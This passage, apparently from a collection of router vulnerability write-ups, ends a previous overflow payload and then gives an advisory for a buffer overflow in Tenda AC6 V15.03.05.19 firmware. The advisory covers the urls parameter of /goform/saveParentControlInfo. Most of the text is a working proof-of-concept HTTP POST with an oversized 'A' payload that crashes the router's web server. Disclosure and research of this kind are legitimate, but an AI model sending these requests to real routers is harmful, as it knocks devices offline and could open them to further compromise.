AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
```

![image-20221118151225120](images/03.png)
--------------------------------------------------------------------------------
/tenda_ac6/saveParentControlInfo_urls/saveParentControlInfo_urls.md:
--------------------------------------------------------------------------------
# Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the urls parameter in the saveParentControlInfo function.

## Description

`Tenda` Router **AC6V1.0 V15.03.05.19** was discovered to contain a buffer overflow in the `httpd` module when handling the `/goform/saveParentControlInfo` request.

## Firmware information

* Manufacturer's address: https://www.tenda.com.cn/

* Firmware download address: https://www.tenda.com.cn/download/detail-2681.html

## Affected version

![](images/01.png)

## Vulnerability details

This vulnerability lies in the `/goform/saveParentControlInfo` page. The details are shown below:

![image-20221118151728054](images/02.png)

## POC

This POC can result in a DoS.

```
POST /goform/saveParentControlInfo HTTP/1.1
Host: 192.168.204.133
Content-Length: 1157
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.204.133
Referer: http://192.168.204.133/parental_control.html?random=0.7058891673130268&
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: password=iqb1qw; bLanguage=cn
Connection: close

urls=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA